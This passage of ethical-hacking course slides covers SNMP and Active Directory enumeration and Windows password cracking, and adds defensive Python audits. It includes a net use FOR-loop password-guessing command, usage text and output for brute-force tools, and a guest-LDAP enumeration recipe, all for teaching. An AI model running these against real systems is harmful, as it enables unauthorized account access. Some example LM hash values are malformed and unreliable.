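EventID,TimeCreated,TargetUserName,TargetDomainName,LogonType,IpAddress,AuthenticationPackageName
4624,2024-01-01T10:00:01,ANONYMOUS LOGON,NT AUTHORITY,3,203.0.113.5,NTLM
4624,2024-01-01T10:00:02,jsmith,CORP,3,192.0.2.44,Kerberos
4624,2024-01-01T10:00:02,ANONYMOUS LOGON,NT AUTHORITY,3,203.0.113.5,NTLM
4624,2024-01-01T10:00:03,ANONYMOUS LOGON,NT AUTHORITY,3,203.0.113.5,NTLM
4624,2024-01-01T10:00:09,ANONYMOUS LOGON,NT AUTHORITY,3,192.0.2.44,NTLM
4624,2024-01-01T10:00:10,svc_backup,CORP,5,-,Negotiate
"""


def load_events(text):
    """Parse the CSV export into a list of dicts keyed by column name."""
    return list(csv.DictReader(io.StringIO(text)))


def is_null_session(ev):
    """A successful network logon by the anonymous account."""
    return (ev["EventID"] == "4624"
            and ev["LogonType"] == "3"
            and ev["TargetUserName"].upper() == "ANONYMOUS LOGON")


def null_sessions_by_source(events):
    """Count anonymous network logons per source address."""
    return Counter(ev["IpAddress"] for ev in events if is_null_session(ev))


def suspicious_sources(events, threshold=3):
    """Sources at or above the threshold: repeated anonymous logons from one
    host are what enumeration tools leave behind, while a single one may be
    ordinary browser or service traffic."""
    counts = null_sessions_by_source(events)
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    events = load_events(SAMPLE_EXPORT)
    print("null sessions per source:", dict(null_sessions_by_source(events)))
    print("worth a look:", suspicious_sources(events))
```

Pair the count with the RestrictAnonymous setting above: with the value at 2, the same anonymous logons still appear in the log, but the enumeration calls behind them fail, so a burst of them is a probe worth investigating rather than a successful dump.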
SNMP Enumeration

© SNMP is simple. Managers send requests to agents, and the agents send back replies.

© The requests and replies refer to variables accessible to the agent software.

© Managers can also send requests to set values for certain variables.

© Traps let the manager know that something significant has happened at the agent's end of things:

  • a reboot

  • an interface failure,

  • or that something else that is potentially bad has happened.

© Enumerating NT users via the SNMP protocol is easy using snmputil.
Management Information Base

© MIB provides a standard representation of the SNMP agent's available information and where it is stored.

© MIB is the most basic element of network management.

© MIB-II is the updated version of the standard MIB.

© MIB-II adds new SYNTAX types, and adds more manageable objects to the MIB tree.
SNMPutil Example

[Screenshot: C:\WINNT\System32\cmd.exe:]

    C:\>snmputil get 210.212.69.129 public .1.3.6.1.2.1.1.2.0
    Variable = system.sysObjectID.0
    Value = ObjectID 1.3.6.1.4.1.9.1.27

    C:\>snmputil getnext 210.212.69.129 public interfaces.ifNumber.0
    Variable = interfaces.ifTable.ifEntry.ifIndex.1
    Value = Integer32 1

    C:\>snmputil getnext 210.212.69.129 public interfaces.ifTable.ifEntry.ifIndex.1
    Variable = interfaces.ifTable.ifEntry.ifIndex.2
    Value = Integer32 2

    C:\>snmputil getnext 210.212.69.129 public interfaces.ifTable.ifEntry.ifIndex.2
    Variable = interfaces.ifTable.ifEntry.ifIndex.3
    Value = Integer32 3

    C:\>snmputil getnext 210.212.69.129 public 0.0
    Variable = system.sysDescr.0
    Value = String <0x43><0x69><0x73><0x63><0x6f><0x20><0x49><0x6e><0x74><0x65><0x72><0x6e><0x65>
    <0x74><0x77><0x6f><0x72><0x6b><0x20><0x4f><0x70><0x65><0x72><0x61><0x74><0x69>
    <0x6e><0x67><0x20><0x53><0x79><0x73><0x74><0x65><0x6d><0x20><0x53><0x6f><0x66>
    <0x74><0x77><0x61><0x72><0x65><0x20><0x0d><0x0a><0x49><0x4f><0x53><0x20><0x28>
    <0x74><0x6d><0x29><0x20><0x32><0x35><0x30><0x30><0x20><0x53><0x6f><0x66><0x74>
    <0x77><0x61><0x72><0x65><0x20><0x28><0x43><0x32><0x35><0x30><0x30><0x2d><0x49>
    <0x2d><0x4c><0x29><0x2c><0x20><0x56><0x65><0x72><0x73><0x69><0x6f><0x6e><0x20>
    <0x31><0x31><0x2e><0x32><0x28><0x31><0x30><0x61><0x29><0x2c><0x20><0x52><0x45>
    <0x4c><0x45><0x41><0x53><0x45><0x20><0x53><0x4f><0x46><0x54><0x57><0x41><0x52>
    <0x45><0x20><0x28><0x66><0x63><0x31><0x29><0x0d><0x0a><0x43><0x6f><0x70><0x79>
    <0x72><0x69><0x67><0x68><0x74><0x20><0x28><0x63><0x29><0x20><0x31><0x39><0x38>
    <0x36><0x2d><0x31><0x39><0x39><0x37><0x20><0x62><0x79><0x20><0x63><0x69><0x73>
    <0x63><0x6f><0x20><0x53><0x79><0x73><0x74><0x65><0x6d><0x73><0x2c><0x20><0x49>
    <0x6e><0x63><0x2e><0x0d><0x0a><0x43><0x6f><0x6d><0x70><0x69><0x6c><0x65><0x64>
    <0x20><0x54><0x75><0x65><0x20><0x30><0x32><0x2d><0x44><0x65><0x63><0x2d><0x39>
    <0x37><0x20><0x31><0x36><0x3a><0x30><0x32><0x20><0x62><0x79><0x20><0x63><0x6b>
    <0x72><0x61><0x6c><0x69><0x6b>
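snmputil prints OCTET STRING values as <0xNN> escapes, and sysObjectID carries the vendor's IANA private enterprise number (1.3.6.1.4.1.<enterprise>...), so the session above identifies the device once decoded. The Python below is an added example, not the course's or snmputil's code; it parses a transcript transcribed from the screenshot, decodes sysDescr, and resolves the enterprise number with a small constructed table (9 = cisco, 311 = Microsoft, 8072 = net-snmp).

```python
"""Decode an snmputil session like the one above.

Added example, not the course's or snmputil's code.  SYSDESCR_RAW is
transcribed from the screenshot; IANA_ENTERPRISES is a small constructed
subset of the IANA private-enterprise registry.
"""
import re

SYSDESCR_RAW = (
    "<0x43><0x69><0x73><0x63><0x6f><0x20><0x49><0x6e><0x74><0x65><0x72><0x6e><0x65>"
    "<0x74><0x77><0x6f><0x72><0x6b><0x20><0x4f><0x70><0x65><0x72><0x61><0x74><0x69>"
    "<0x6e><0x67><0x20><0x53><0x79><0x73><0x74><0x65><0x6d><0x20><0x53><0x6f><0x66>"
    "<0x74><0x77><0x61><0x72><0x65><0x20><0x0d><0x0a><0x49><0x4f><0x53><0x20><0x28>"
    "<0x74><0x6d><0x29><0x20><0x32><0x35><0x30><0x30><0x20><0x53><0x6f><0x66><0x74>"
    "<0x77><0x61><0x72><0x65><0x20><0x28><0x43><0x32><0x35><0x30><0x30><0x2d><0x49>"
    "<0x2d><0x4c><0x29><0x2c><0x20><0x56><0x65><0x72><0x73><0x69><0x6f><0x6e><0x20>"
    "<0x31><0x31><0x2e><0x32><0x28><0x31><0x30><0x61><0x29><0x2c><0x20><0x52><0x45>"
    "<0x4c><0x45><0x41><0x53><0x45><0x20><0x53><0x4f><0x46><0x54><0x57><0x41><0x52>"
    "<0x45><0x20><0x28><0x66><0x63><0x31><0x29><0x0d><0x0a><0x43><0x6f><0x70><0x79>"
    "<0x72><0x69><0x67><0x68><0x74><0x20><0x28><0x63><0x29><0x20><0x31><0x39><0x38>"
    "<0x36><0x2d><0x31><0x39><0x39><0x37><0x20><0x62><0x79><0x20><0x63><0x69><0x73>"
    "<0x63><0x6f><0x20><0x53><0x79><0x73><0x74><0x65><0x6d><0x73><0x2c><0x20><0x49>"
    "<0x6e><0x63><0x2e><0x0d><0x0a><0x43><0x6f><0x6d><0x70><0x69><0x6c><0x65><0x64>"
    "<0x20><0x54><0x75><0x65><0x20><0x30><0x32><0x2d><0x44><0x65><0x63><0x2d><0x39>"
    "<0x37><0x20><0x31><0x36><0x3a><0x30><0x32><0x20><0x62><0x79><0x20><0x63><0x6b>"
    "<0x72><0x61><0x6c><0x69><0x6b>"
)

# Constructed transcript in snmputil's "Variable = / Value =" layout.
SNMPUTIL_OUTPUT = (
    "Variable = system.sysObjectID.0\n"
    "Value = ObjectID 1.3.6.1.4.1.9.1.27\n"
    "\n"
    "Variable = interfaces.ifTable.ifEntry.ifIndex.1\n"
    "Value = Integer32 1\n"
    "\n"
    "Variable = system.sysDescr.0\n"
    "Value = String " + SYSDESCR_RAW + "\n"
)

IANA_ENTERPRISES = {9: "cisco", 311: "Microsoft", 8072: "net-snmp"}

ESCAPE_RE = re.compile(r"<0x([0-9a-fA-F]{2})>")
VAR_RE = re.compile(r"^Variable = (\S+)\s*$")
VAL_RE = re.compile(r"^Value = (\w+)\s*(.*)$")


def decode_snmputil_string(raw):
    """Turn <0xNN> escapes into text; an OCTET STRING is bytes, so latin-1
    maps every byte to one character and keeps the embedded CR/LF."""
    data = bytes(int(h, 16) for h in ESCAPE_RE.findall(raw))
    return data.decode("latin-1")


def parse_snmputil(output):
    """Pair each 'Variable =' line with its 'Value =' line.
    Returns [(variable, asn_type, value)], with String values decoded."""
    results, current = [], None
    for line in output.splitlines():
        m = VAR_RE.match(line)
        if m:
            current = m.group(1)
            continue
        m = VAL_RE.match(line)
        if m and current is not None:
            asn_type, raw = m.group(1), m.group(2).strip()
            value = decode_snmputil_string(raw) if asn_type == "String" else raw
            results.append((current, asn_type, value))
            current = None
    return results


def enterprise_from_sysobjectid(oid):
    """A sysObjectID under 1.3.6.1.4.1.<enterprise>... names the vendor."""
    parts = [int(p) for p in oid.strip().strip(".").split(".")]
    if parts[:6] != [1, 3, 6, 1, 4, 1] or len(parts) < 7:
        return None
    return parts[6]


def summarize(output):
    """What a reviewer wants from the session: vendor and OS banner."""
    values = {var: val for var, _type, val in parse_snmputil(output)}
    oid = values.get("system.sysObjectID.0")
    ent = enterprise_from_sysobjectid(oid) if oid else None
    return {
        "sysObjectID": oid,
        "enterprise": ent,
        "vendor": IANA_ENTERPRISES.get(ent, "unknown"),
        "sysDescr": values.get("system.sysDescr.0"),
    }


if __name__ == "__main__":
    s = summarize(SNMPUTIL_OUTPUT)
    print("vendor:", s["vendor"], "(enterprise %s)" % s["enterprise"])
    print(s["sysDescr"])
```

The decoded sysDescr is the router's IOS banner, software train and build date, which is exactly why a readable community string on a network device is treated as an information leak in its own right.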
Tool: Solarwinds

© It is a set of network management tools.

© The tool set consists of the following:

  Discovery
  Cisco Tools
  Ping Tools
  Address Management
  Monitoring
  MIB Browser
  Security
  Miscellaneous

[Screenshot: SolarWinds Network Management Tools, MAC Address Discovery (toolbar: Export, Print, Settings, Help). Local Subnet 192.168.1.0, button "Discover MAC Addresses". Result columns: IP Address, MAC Address, DNS, Network Card Manufacturer; rows 192.168.1.23 (home-3oxi55tiweb), 192.168.1.21 (ECCINDIADMN), 192.168.1.25. Status: "MAC Address Discovery Complete. 3 addresses."]
Tool: SNScan V1.05

© It is a Windows-based SNMP scanner that can effectively detect SNMP-enabled devices on the network.

© It scans specific SNMP ports and uses public and user-defined SNMP community names.

© It is handy as a tool for information gathering.

[Screenshot: SNScan 1.05 - Copyright Foundstone Inc. - http://www.foundstone.com. IP addresses to scan: Hostname/IP 192.168.1.21; Start IP 192.168.1.22, End IP 192.168.1.25; "Read IPs from file" / Browse...; listed targets 192.168.1.21, 192.168.1.2x, 192.168.1.25; buttons Clear Selected, Clear All. SNMP ports to scan: 161 (checked), 162, 193, 199, 391, 1993. SNMP community string: "Just try this one name: public" (selected) / "Multiple names from list". Scan control: Randomize scan order, Timeout (ms) 2100; Scanned: 5/5; result columns Port, Name, Description; Save...]

Source: http://www.foundstone.com
SNMP Enumeration Countermeasures

© The simplest way to prevent such activity is to remove the SNMP agent or turn off the SNMP service.

© If shutting off SNMP is not an option, then change the default "public" community name.

© Implement the Group Policy security option called "Additional restrictions for anonymous connections."

© Access to null session pipes and null session shares, and IPSec filtering, should also be restricted.
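For a net-snmp agent the "change the default community" advice is a few lines of snmpd.conf, and it is easy to check mechanically. The following added example (not from the course material) audits constructed rocommunity/rwcommunity/com2sec lines for default names, missing source restrictions and write access, and shows a hardened configuration beside the weak one; the community string and subnet in it are made up.

```python
"""Audit net-snmp snmpd.conf community settings.

Added example, not from the course material.  Directive syntax follows
net-snmp's snmpd.conf ("rocommunity COMMUNITY [SOURCE ...]",
"rwcommunity COMMUNITY [SOURCE ...]", "com2sec NAME SOURCE COMMUNITY");
both configurations below are constructed.
"""
DEFAULT_COMMUNITIES = {"public", "private"}
COMMUNITY_DIRECTIVES = ("rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6")

WEAK_CONF = """\
# constructed: stock-style configuration
rocommunity public
rwcommunity private
com2sec readonly default public
"""

HARDENED_CONF = """\
# constructed: read-only, non-default name, management subnet only
rocommunity Kq7vX2pLmN9t 192.0.2.0/24
"""


def audit_snmpd_conf(text):
    """Return [(line_number, finding)] for every weak community setting."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # drop comments
        if not line:
            continue
        tok = line.split()
        directive = tok[0].lower()
        if directive in COMMUNITY_DIRECTIVES:
            community = tok[1] if len(tok) > 1 else ""
            # net-snmp treats a missing SOURCE as "default" (any address)
            source = tok[2] if len(tok) > 2 else "default"
        elif directive == "com2sec":
            if len(tok) < 4:
                continue
            source, community = tok[2], tok[3]
        else:
            continue
        if community.lower() in DEFAULT_COMMUNITIES:
            findings.append((lineno, "default community name %r" % community))
        if source == "default":
            findings.append((lineno, "no source restriction (accepts any address)"))
        if directive.startswith("rwcommunity"):
            findings.append((lineno, "write access granted; prefer read-only unless required"))
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print("%s config: %d finding(s)" % (label, len(audit_snmpd_conf(conf))))
        for lineno, finding in audit_snmpd_conf(conf):
            print("  line %d: %s" % (lineno, finding))
```

A non-default name alone is not enough, because the string still travels in clear text in SNMPv1/v2c; the source restriction is what keeps SNScan-style sweeps from other subnets from getting a reply at all.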
Tool: Winfingerprint

© Winfingerprint is GUI-based.

© It has the option of scanning a single host or a continuous network block.

© Has two main windows:

  • IP address range

  • Windows options

[Screenshot: Winfingerprint 0.5.10. Input Options: IP List / Single Host / Neighborhood; Starting IP Address 192.168.170.1, Ending IP Address 192.168.170.1, Netmask. Network Type: NT Domain (selected), Active Directory, WMI. Scan Options: Win32 OS Version, Users, Registry, Null IPC$ Sessions, Services, NBT, NetBIOS Shares, Disks, Sessions, Date and Time, Groups, Event Log, Errors. General Options: Timeout for TCP/UDP/ICMP/SNMP, Retries, interface "Intel 8255x-based Integrated Fast Ethernet", TCP Portscan Range, UDP Portscan Range, SNMP Community String; buttons Clear, Help.]

Source: http://winfingerprint.sourceforge.net
• All the existing users and groups could be enumerated with a simple LDAP query.

• Windows Server 2003's AD is largely identical to its predecessor and thus can be accessed by LDAP query tools.

• The only thing required to perform this enumeration is to create an authenticated session via LDAP.

• Connect to any AD server using ldp.exe on port 389.

• Authenticate yourself using Guest or any domain account.

• Now all the users and built-in groups could be enumerated.
AD Enumeration Countermeasures

• How is this possible with a simple guest account?

• The Win2k dcpromo installation screen prompts whether the user wants to relax access permissions on the directory to allow legacy servers to perform lookups:

1. Permissions compatible with pre-Win2k servers.

2. Permissions compatible only with Win2k servers.

• Choose option 2 during AD installation.
Steps to Perform Enumeration

1. Extract user names using Win2k enumeration.

2. Gather information from the host using null sessions.

3. Perform Windows enumeration using the tool SuperScan4.

4. Get the user accounts using the tool GetAcct.

5. Perform an SNMP port scan using the tool SNScan V1.05.
• Enumeration involves active connections to systems and directed queries.

• The type of information enumerated by intruders includes network resources and shares, users and groups, and applications and banners.

• Null sessions are often used by crackers to connect to target systems.

• NetBIOS and SNMP enumerations can be disguised using tools such as snmputil, nat, etc.

• Tools such as user2sid, sid2user, and userinfo can be used to identify vulnerable user accounts.
Ethical Hacking

Module V
System Hacking

Module Objective

• Understanding password cracking

• Understanding password attacks

• Identifying various password cracking tools

• Formulating countermeasures for password cracking

• Escalating privileges

• Understanding keyloggers and other spyware

• Hiding files

• Understanding rootkits

• The use of steganography

• Covering tracks
Module Flow

[Diagram: Tools for Password Attacks → Password Cracking Countermeasures → Password Sniffing → Escalation of Privileges]
Scenario

David works in the University Examination cell. Recently, he has been approached by a group of students who would like him to leak out the examination papers in exchange for money. Only David's boss, Daniel, has access to the Question Bank. David is tempted by the offer, so he accepts. How do you think David will proceed in his actions?

• Do you think that David will be able to hijack Daniel's account to leak information?

• What preliminary study will David do before starting the actual action?

• Can Daniel be held responsible in case David succeeds in his evil design?
System Hacking: Part I

Cracking passwords

CEH Hacking Cycle

[Diagram: Enumeration → Cracking passwords → Escalating privileges]
Password Types

• Passwords that contain only letters.

  • HIJKLMNO

• Passwords that contain only numbers.

  • 758904

• Passwords that contain only special characters.

  • $@$!()

• Passwords that contain letters and numbers.

  • ax1500g

• Passwords that contain only letters and special characters.

  • m@roon$

• Passwords that contain only special characters and numbers.

  • @$47$

• Passwords that contain letters, special characters, and numbers.

  • Eln@8$
CHC: Cracking passwords

Types of Password Attack

Four types of
Passive Online: Wire Sniffing

• Access and record raw network traffic

• Wait until authentication sequence

• Brute force credentials

• Considerations

  • Relatively hard to perpetrate

  • Usually extremely computationally complex

  • Tools widely available
Passive Online Attacks

Man-in-the-Middle and Replay Attacks

• Somehow get access to communications channel

• Wait until authentication sequence

• Proxy authentication traffic

• No need to brute-force

• Considerations

  • Relatively hard to perpetrate

  • Must be trusted by one or both sides

  • Some tools widely available

  • Can sometimes be broken by invalidating traffic
Active Online: Password Guessing

• Try different passwords until one works

• Succeeds with...

  • Bad passwords

  • Open authentication points

• Considerations

  • Should take a long time

  • Requires huge amounts of network bandwidth

  • Easily detected

  • Core problem: bad passwords
Offline Attacks

• Time consuming

• LM hashes much more vulnerable due to smaller key space and shorter length

• Web services available

• Distributed password cracking techniques available

• Mitigations

  • Use good passwords

  • Remove LM hashes

• Attacker has password database

• Password representations must be cryptographically secure

• Considerations

  • Moore's law
Offline Attacks

Dictionary Attack

• Try different passwords from a list

• Succeeds only with poor passwords

• Considerations

  • Very fast

  • Core problem: bad passwords

Hybrid Attack

• Start with dictionary

• Insert entropy

  • Append a symbol

  • Append a number

• Considerations

  • Relatively fast

  • Succeeds when entropy is poorly used
Offline Attacks

Brute-force Attack

• Try all possible passwords

  • More commonly, a subset thereof

• Usually implemented with progressive complexity

• Typically, LM "hash" is attacked first

• Considerations

  • Very slow

  • All passwords will eventually be found

  • Attack against NT hash is MUCH harder than LM hash
Offline Attacks

Pre-computed Hashes

• Generate all possible hashes

• Compare to database values

• Storing hashes requires huge storage

  • LM "Hashes": 310 Terabytes

  • NT Hashes < 15 chars: 5,652,897,009 exabytes

• Solution: Use a time-space tradeoff
Non-Technical Attacks

• Shoulder surfing

  • Watching someone type their password

  • Common and successful

  • Mouthing password while typing

• Keyboard sniffing

  • Hardware is cheap and hard to detect

  • Software is cheap and hard to detect

  • Both can be controlled remotely

• Social engineering

  • Discussed in Module 9
Password Mitigation

Use the following in place of passwords:

• Smart cards

  • Two-factor authentication

  • Very difficult to thwart

  • High cost of initial deployment

• Biometric

  • Two- or three-factor authentication

  • Usually defeated with non-technical attacks

  • Very expensive

  • Failure-prone
Permanent Account Lockout - Employee Privilege Abuse

Termination Notice

Employee Name:
Employee ID:
Employee Address:
Employee SSN:
Manager Name:
Manager ID:
Department:
Termination Effective Date:
Benefits Continuation: □ Yes □ No
Severance Package: □ Yes □ No

Termination Reason:

□ Opening unsolicited e-mail
□ Sending spam
□ Emanating viruses
□ Port scanning
□ Attempted unauthorized access
□ Surfing porn
□ Installing shareware
□ Possession of hacking tools
□ Refusal to abide by security policy
□ Sending unsolicited e-mail
□ Allowing kids to use company computer to do homework
□ Disabling virus scanner
□ Running P2P file sharing
□ Unauthorized file/web serving
□ Annoying the Sysadmin
Administrator Password Guessing

• Assuming that NetBIOS TCP port 139 is open, the most effective method of breaking into NT/2000 is password guessing.

• Attempting to connect to an enumerated share (ipc$, or c$) and trying username/password combinations.

• Default admin$, c$, %systemdrive% shares are a good starting point.
CHC: Cracking passwords

Manual Password Cracking Algorithm

• Find a valid user

• Create a list of possible passwords

• Rank the passwords from high probability to low

• Key in each password

• If the system allows in - success, or else try again

[Diagram: a manual attacker submits username/password pairs (john/dfdfg, peter/34dre45, Rudy/98#rt, Jacob/nukk) to the system one at a time]
Automatic Password Cracking Algorithm

• Find a valid user

• Find encryption algorithm used

• Obtain encrypted passwords

• Create list of possible passwords

• Encrypt each word

• See if there is a match for each user ID

• Repeat steps 1 through 6

[Diagram: a password cracker tries username/password pairs (john/dfdfg, Rudy/98#rt, peter/34dre45, Jacob/nukk) against the system at an attack speed of 300 words/sec]
CHC: Cracking passwords

Performing Automated Password Guessing

• Performing automated password guessing is easy: a simple loop using the NT/2000 shell FOR command based on the standard NET USE syntax.

1. Create a simple user name and password file.

2. Pipe this file into the FOR command:

C:\> FOR /F "tokens=1,2*" %i in (credentials.txt) do net use \\target\IPC$ %i /u:%j

[Screenshot: credentials.txt, one "password username" pair per line: password administrator, xycdf john, babe_me rebecca, freak_you Rumsfield]
Tool: NAT

• The NetBIOS Auditing Tool (NAT) is designed to explore the NetBIOS file-sharing services offered by the target system.

  • It implements a stepwise approach to gather information and attempt to obtain file system-level access as though it were a legitimate local client.

• If a NetBIOS session can be established at all via TCP port 139, the target is declared "vulnerable."

• Once the session is fully set up, transactions are performed to collect more information about the server, including any file system "shares" it offers.
NAT Screenshot

[Screenshot: C:\WINNT\system32\cmd.exe - nat -u userlist.txt -p passlist.txt 10.0.0.6]

[*] Obtaining list of remote NetBIOS names
[*] Remote systems name tables:
    SYSTEM1VOGI
    SYSTEM1VOGI
    SOURCE HOMING
    SOURCE HOMING
    SOURCE HOMING
    INet~Services
    __MSBROWSE__
    IS~SYSTEM1VOGI
[*] Attempting to connect with name: *
[*] Unable to connect
[*] Attempting to connect with name: SYSTEM1VOGI
[*] CONNECTED with name: SYSTEM1VOGI
[*] Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*] Server time is Thu Apr 28 05:36:42 2005
[*] Timezone is UTC-7.0
[*] Remote server wants us to encrypt, telling it not to

EC-Council

CHC: Cracking passwords

Copyright © by EC-Council
All Rights reserved. Reproduction is strictly prohibited

smbbf (SMB Passive Brute Force Tool)

SMB - Bruteforcer V1.0.4 by (patrik.karlsson@ixsecurity.com)

usage: smbbf -i [options]

-i* IP address of server to bruteforce
-p  Path to file containing passwords
-u  Path to file containing users
-s  Server to bruteforce
-r  Path to report file
-t  timeout for connect (default 300ms)
-w  Workgroup/Domain
-g  Be nice, automatically detect account lockouts
-v  Be verbose
-P  Protocol version
    0 - Netbios Mode
    1 - Windows 2000 Native Mode
Hacking Tool: L0phtcrack

[Screenshot: @stake LC4 main window listing the user names Administrator, aschmidt, cwysopal, Guest, mgavin and rcheyne with LM Password, NTLM Password, LM Hash and NTLM Hash columns, the "Auditing Options For This Session" dialog, and the status panel (words total, current test, total users, audited users, time left)]

Dictionary Crack: The Dictionary Crack tests for passwords that are the same as the words listed in the word file. This test is very fast and finds the weakest passwords.

Dictionary/Brute Hybrid Crack (characters to prepend, characters to append, common letter substitutions): The Dictionary/Brute Hybrid Crack tests for passwords that are variations of the words in the word file. It finds passwords such as "Dana99" or "monkeys!". This test is fast and finds weak passwords.

Brute Force Crack (optionally distributed, part N of M): character set A-Z, 0-9 and special characters, or a custom character set listing each character.

LC4 is a password auditing and recovery package distributed by @stake software. SMB packet capture listens to the local network segment and captures individual login sessions.
Microsoft Authentication

• NTLM (NT LAN Manager) is a challenge/response form of authentication that was the default network authentication protocol in Windows NT 4.0/Windows 2000.

• Microsoft has upgraded its default authentication protocol to Kerberos, a considerably more secure option than NTLM.
LM, NTLMv1 and NTLMv2

Attribute                  LM                      NTLMv1                  NTLMv2
Password case sensitive    No                      Yes                     Yes
Hash key length            56bit + 56bit           -                       -
Password hash algorithm    DES (ECB mode)          MD4                     MD4
Hash value length          64bit + 64bit           128bit                  128bit
C/R key length             56bit + 56bit + 16bit   56bit + 56bit + 16bit   128bit
C/R algorithm              DES (ECB mode)          DES (ECB mode)          HMAC-MD5
C/R value length           64bit + 64bit + 64bit   64bit + 64bit + 64bit   128bit
What is LAN Manager Hash?

Example: Let's say that the password is: 123456qwerty

• When this password is encrypted with the LM algorithm, it is first converted to all uppercase: 123456QWERTY

• The password is padded with null (blank) characters to make it 14 characters long: 123456QWERTY__

• Before encrypting this password, the 14-character string is split into halves: 123456Q and WERTY__

• Each string is individually encrypted and the results concatenated.

• 123456Q = 6BF11E04AFAB197F

  WERTY__ = F1E9FFDCC75575B15

• The hash is 6BF11E04AFAB197FF1E9FFDCC75575B15

Note: The first half of the hash contains alphanumeric characters and it will take 24 hrs to crack by L0phtcrack, and the second half only takes 60 seconds.
LM Hash

[Diagram: 16-byte LM hash beside 16-byte NTLM hash (MD4); 1st 8 bytes of the LM hash from the first 7 chars, 2nd 8 bytes of the LM hash from the second 7 chars]

• The first 8 bytes are derived from the first 7 characters of the password and the second 8 bytes are derived from characters 8 through 14 of the password.

• If the password is less than 7 characters, then the second half will always be 0xAAD3B435B51404EE.

• Let's assume, for this example, that the user's password has an LM hash of 0xC234BA8A1E7665fAAD3B435B51404EE.

• LC4 will crack the password as "WELCOME".
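The LM preparation steps above and the second-half weakness, as an added Python example (not from the courseware or any tool it describes): it reproduces the uppercase/pad/split steps and audits a hash dump for accounts that still have an LM hash or whose second half is the empty constant. The pwdump line format `user:rid:LMhash:NThash:::` and the sample dump are assumptions, constructed for illustration.

```python
# Added example, not part of the CEH courseware: the LM pre-processing the
# slides walk through (uppercase, null-pad to 14, split into two 7-character
# halves), plus a defender-side audit of pwdump-format dumps for the LM
# weaknesses the slides describe. Assumed: pwdump lines look like
# "user:rid:LMhash:NThash:::"; the sample dump below is constructed.
from __future__ import annotations

import re

# The 8-byte half LM produces for an all-null 7-byte block, i.e. the value the
# slides show for the second half when the password has no characters 8-14.
EMPTY_LM_HALF = "AAD3B435B51404EE"
# Both halves empty: LM hashing disabled, or an empty password.
EMPTY_LM_HASH = EMPTY_LM_HALF * 2

PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9A-Fa-f]{32}):(?P<nt>[0-9A-Fa-f]{32}):"
)


def lm_halves(password: str) -> tuple[bytes, bytes]:
    """Reproduce the slides' LM preparation steps and return the two 7-byte
    blocks that LM encrypts independently (NT uses the OEM code page; ASCII
    is assumed here). Raises for passwords LM cannot represent."""
    raw = password.upper().encode("ascii")
    if len(raw) > 14:
        raise ValueError("LM hashes exist only for passwords of at most 14 characters")
    raw = raw.ljust(14, b"\x00")          # pad with nulls to 14 bytes
    return raw[:7], raw[7:]               # halves are cracked separately


def lm_weakness(lm_hash: str) -> list[str]:
    """Describe what the structure of a stored LM hash gives away."""
    h = lm_hash.upper()
    if h == EMPTY_LM_HASH:
        return ["no LM hash stored (LM disabled or empty password)"]
    findings = ["LM hash present: case-insensitive, two independent 7-char halves"]
    if h[16:] == EMPTY_LM_HALF:
        findings.append("second half empty: password is at most 7 characters")
    return findings


def audit_pwdump(lines) -> dict[str, list[str]]:
    """Map every account in a pwdump-format dump to its LM findings;
    comment lines and lines that do not match the format are skipped."""
    report: dict[str, list[str]] = {}
    for line in lines:
        m = PWDUMP_RE.match(line.strip())
        if m:
            report[m["user"]] = lm_weakness(m["lm"])
    return report


# Constructed sample dump: the hex values are placeholders, not real hashes,
# except for the AAD3B435B51404EE empty-half constant from the slides.
SAMPLE_PWDUMP = """\
# user:rid:lmhash:nthash:::
Administrator:500:0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210:::
short7:1001:0123456789ABCDEFAAD3B435B51404EE:FEDCBA9876543210FEDCBA9876543210:::
nolm:1002:AAD3B435B51404EEAAD3B435B51404EE:FEDCBA9876543210FEDCBA9876543210:::
"""

if __name__ == "__main__":
    print(lm_halves("123456qwerty"))   # (b'123456Q', b'WERTY\x00\x00')
    for user, findings in audit_pwdump(SAMPLE_PWDUMP.splitlines()).items():
        print(f"{user}: {'; '.join(findings)}")
```

Accounts reported with an LM hash present are the ones the offline attacks on the surrounding slides target first; removing LM hash storage is the mitigation listed earlier.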
pwdump2 and pwdump3

[Screenshot: Command Prompt]

• pwdump2 decrypts a password or password file. It uses an algorithmic approach as well as brute forcing.

• pwdump3 is a Windows NT/2000 remote password hash grabber. Usage of this program requires administrative privileges on the remote system.
Tool: Rainbowcrack

• Hash cracker

• Pre-computes all possible plaintext-ciphertext pairs in advance and stores them in the file called "rainbow table"

C:\CEH\HajaSTools\rainbowcrack>rcrack

RainbowCrack 1.2 - Making a Faster Cryptanalytic Time-Memory Trade-Off
by Zhu Shuanglei <shuanglei@hotmail.com>
http://www.antsight.com/zsl/rainbowcrack/

usage: rcrack rainbow_table_pathname -h hash
       rcrack rainbow_table_pathname -l hash_list_file
       rcrack rainbow_table_pathname -f pwdump_file
rainbow_table_pathname: pathname of the rainbow table(s), wildchar(*, ?) supported
-h hash:           use raw hash as input
-l hash_list_file: use hash list file as input, each hash in a line
-f pwdump_file:    use pwdump file as input, this will handle lanmanager hash only

example: rcrack *.rt -h 5d41402abc4b2a76b9719d911017c592
         rcrack *.rt -l hash.txt
         rcrack *.rt -f hash.txt
Hacking Tool: KerbCrack

• KerbCrack consists of two programs, kerbsniff and kerbcrack. The sniffer listens on the network and captures Windows 2000/XP Kerberos logins. The cracker can be used to find the passwords from the capture file using a brute force attack or a dictionary attack.

[Screenshot: C:\WINNT\System32\cmd.exe]

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\>kerbcrack

KerbCrack 1.2 - (c) 2002, Arne Vidstrom
- http://ntsecurity.nu/toolbox/kerbcrack/

Usage: kerbcrack <capture file> <crack mode> [dictionary file] [password size]

crack modes:
-b1 = brute force attack with (a-z, A-Z)
-b2 = brute force attack with (a-z, A-Z, 0-9)
-b3 = brute force attack with (a-z, A-Z, 0-9, special characters)
-b4 = b1 + swedish letters
-b5 = b2 + swedish letters
-b6 = b3 + swedish letters
-d = dictionary attack with specified dictionary file
Hacking Tool: NBTDeputy

